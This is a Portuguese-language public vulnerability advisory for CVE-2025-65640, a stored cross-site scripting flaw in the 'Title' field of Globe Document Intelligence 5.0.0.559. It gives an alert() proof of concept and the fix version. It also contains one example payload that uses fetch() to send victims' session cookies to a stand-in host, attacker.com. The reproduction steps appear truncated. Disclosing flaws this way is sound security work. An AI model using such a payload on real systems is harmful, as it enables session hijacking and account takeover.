
Aviso público para CVE-2025-65640: vulnerabilidade de XSS armazenado no Globe Document Intelligence.
Foi identificada uma vulnerabilidade de Cross-Site Scripting (XSS) Armazenado na plataforma Globe Document Intelligence (versão 5.0.0.559). O aplicativo não sanitiza nem codifica adequadamente a entrada fornecida pelo usuário na propriedade "Título" de um documento recém-criado. Quando um usuário autenticado navega para as páginas de resumo (por exemplo, "Tarefa em andamento / Recentes"), o payload malicioso é refletido e executado no contexto do navegador da vítima.
Esta vulnerabilidade permite que um atacante autenticado armazene código JavaScript malicioso no servidor.
Quando outros usuários autenticados (incluindo contas administrativas) visualizam as páginas afetadas, o script é executado automaticamente.
Embora a Prova de Conceito abaixo demonstre a vulnerabilidade usando um alert() benigno, um atacante pode explorar essa falha para realizar Sequestro de Sessão e Tomada de Conta.
Por exemplo, a injeção de um payload como <script>fetch('https://attacker.com/?cookie='+encodeURIComponent(document.cookie))</script> exfiltraria silenciosamente os cookies de sessão da vítima para um servidor externo controlado pelo atacante.
Para reproduzir a vulnerabilidade, um atacante autenticado pode seguir estes passos:
<script>alert("XSS")</script>De acordo com o fornecedor, esta vulnerabilidade foi corrigida na versão 5.1.0.575. Para remediar este problema, recomenda-se atualizar a plataforma Globe Document Intelligence para a versão 5.1.0.575.
Esta Prova de Conceito (PoC) é fornecida exclusivamente para fins educacionais e de pesquisa. As informações e o código descritos neste documento não devem ser usados para atividades maliciosas ou contra quaisquer sistemas sem autorização prévia e explícita dos proprietários dos sistemas. O autor não assume nenhuma responsabilidade e não se responsabiliza por qualquer uso indevido ou dano causado pela aplicação do material fornecido.